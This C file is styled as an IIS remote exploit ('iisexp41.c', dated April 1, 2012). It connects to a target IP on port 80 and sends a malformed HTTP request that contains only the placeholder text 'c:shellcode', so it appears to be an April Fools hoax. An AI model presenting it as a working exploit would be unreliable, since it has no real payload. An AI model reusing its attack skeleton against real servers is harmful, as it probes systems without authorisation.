/*

  iisexp41.c  ver4.1 copy by @yuange1975 2012.4.1
  假作真时真亦假。

  http://weibo.com/yuange1975
  http://twitter.com/yuange75
  http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html


*/
#include <stdio.h>
#include <stdlib.h>

#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>    /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")

char  *AprilFoolsDay ="GET /AprilFools'Day.php  HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; 

static unsigned int maybe_lookup_host(char* name) 
{
	 unsigned long ulAddr = INADDR_NONE;

	 /* Don't bother resolving raw IP addresses, naturally. */
	 ulAddr = inet_addr((char*)name); 
	 if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
	 	return (unsigned int)ulAddr;

	 return 0;
}

int do_exp(char *hostname,unsigned int port)
{
    SOCKET hScoket = INVALID_SOCKET;
	struct sockaddr_in sin;
	unsigned int addr=0;
	int write_res = 0;
	char * crash_buf=NULL;
	int crash_buflen=0;

	/*
	    create SOCKET
	 */
	hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); 
	if (hScoket == INVALID_SOCKET) {	
		printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
		return -1;
	}		

	/* Resolved IP address          */
	addr = maybe_lookup_host(hostname);

	sin.sin_family = AF_INET;
	sin.sin_port   = htons(port);
	memcpy(&sin.sin_addr,&addr,4);

	/*
	    connect
	 */
	if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
		if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
			closesocket(hScoket);
			printf_s("connect function failed with error: %ld\n", WSAGetLastError());
			return -1;
		}
	}	
	
	printf("[*] connected to %s:%d\n",hostname,port);
	
	//build_crash_package(&crash_buf,&crash_buflen);

	crash_buf = AprilFoolsDay;
	crash_buflen = strlen(AprilFoolsDay);

	
		/*
		    send data to remote target
		 */
		write_res = send( hScoket,
			              crash_buf,
	                      crash_buflen,
	                      0);

		
		
		printf("[*] send %d bytes\n",write_res);

		
	

	closesocket(hScoket);
	return 0;
}

int main(int argc, const char **argv)
{
    int iResult;
	int count=0;
    char * target_ip = (char*)argv[1];
	WSADATA	wsaData;

	if ( !target_ip || argc < 2 ) {
		printf_s("usage: <target_ip>\n");
		return 0;
	}
	

	
	
	/* Initialize Winsock */
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf_s("WSAStartup failed: %d\n", iResult);
		return -1;
	}

	do_exp(target_ip,80);
	
	/* clean - win socket */
	WSACleanup();

	return 0;
}